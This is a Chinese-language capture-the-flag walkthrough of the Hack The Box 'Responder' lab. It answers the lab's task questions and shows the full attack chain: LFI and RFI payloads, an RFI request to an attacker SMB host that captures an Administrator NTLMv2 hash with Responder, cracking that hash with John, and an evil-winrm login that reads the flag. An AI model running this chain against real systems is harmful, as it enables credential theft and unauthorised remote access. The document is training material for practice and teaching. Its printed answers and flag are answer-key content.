相关资料

• ​getshell
• responser捕获win hash

• evil-winrm

  Task 1

Q：How many TCP ports are open on the machine?
​

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  wsman
7680/tcp open  pando-pub

Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds

很多命令都可以扫描端口号，不一定非要这一个，如果去掉其他的相关扫描能够节省更多时间
​
A：3
​

Task 2

Q：When visiting the web service using the IP address, what is the domain that we are being redirected to?
​
直接打开访问，看重定向到哪里了
​
A：unika.htb
​

Task 3

Q：Which scripting language is being used on the server to generate webpages?
​
抓包，然后查看response，返回了版本信息
​
也可以通过在hosts文件中添加解析信息，这样就不会重定向后找不到IP地址
​
A：php
​

Task 4

Q：What is the name of the URL parameter which is used to load different language versions of the webpage?
​
随便点一个，要提交的参数
​
A：page
​

Task 5

Q：Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
​
问哪个是本地文件包含
​
A：../../../../../../../../windows/system32/drivers/etc/hosts

​

Task 6

Q：Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
​
问哪个是远程包含
​
A：//10.10.14.6/somefile

​

Task 7

Q：What does NTLM stand for?
​

NTLM是Microsoft创建的认证协议的集合。它是一种质询-响应身份验证协议，用于将客户端认证为Active Directory域中的资源

​
A：New Technology LAN Manager

Task 8

Q：Which flag do we use in the Responder utility to specify the network interface?
​
Responder工具
​
A：-I

​

Task 9

Q：There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.
​
用来破解hash的，这个得尝试用一用responser康康
​
A：john the ripper
​

Task 10

Q：What is the password for the administrator user?
​
先启动responser监听本地tun0网卡
​

┌──(root💀kali)-[~]
└─# responder -I tun0                                                    1 ⨯
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.7.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.86]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-BEA716J9KXD]
    Responder Domain Name      [HALN.LOCAL]
    Responder DCE-RPC Port     [47831]

[+] Listening for events...                                                  

访问unika.htb/?page=//10.10.14.6/somefile

让他远程包含本地文件，这样他会回访我们，就会被拦截到hash

[+] Listening for events...                                                  

          [ON]

[SMB] NTLMv2-SSP Client   : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:c0c8045502c4f5c9:3BC1DBA1408AC8C9983028A14C1D4BAD:010100000000000080A1D5FFB460D8019D88C898C17C526F000000000200080032004F003100440001001E00570049004E002D005800570056003200510039003600370052004100340004003400570049004E002D00580057005600320051003900360037005200410034002E0032004F00310044002E004C004F00430041004C000300140032004F00310044002E004C004F00430041004C000500140032004F00310044002E004C004F00430041004C000700080080A1D5FFB460D80106000400020000000800300030000000000000000100000000200000C87CC66EFD81FD5B28F598D5ABF20A35198A4161CBD14CF93DB63F66F81482FB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000                                       
[*] Skipping previously captured hash for RESPONDER\Administrator

然后新建一个文件，把第7行的hash存进去，用john破解，时间比较长
​

┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII

​
奶奶的跑了两个小时还没跑出来
​
A：badminton
​

Task 11

Q：We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
​
利用的是5985端口上的wsman远程处理
​
A：5985

Flag

安装evil-winrm
工具

┌──(root💀kali)-[~]
└─# gem install evil-winrm

使用破解的密码连上去

┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                   

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                     

Info: Establishing connection to remote endpoint

查看flag
​

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir


    Directory: C:\Users\mike


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop


*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir


    Directory: C:\Users\mike\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac

flag：ea81b7afddd03efaa0945333ed147fac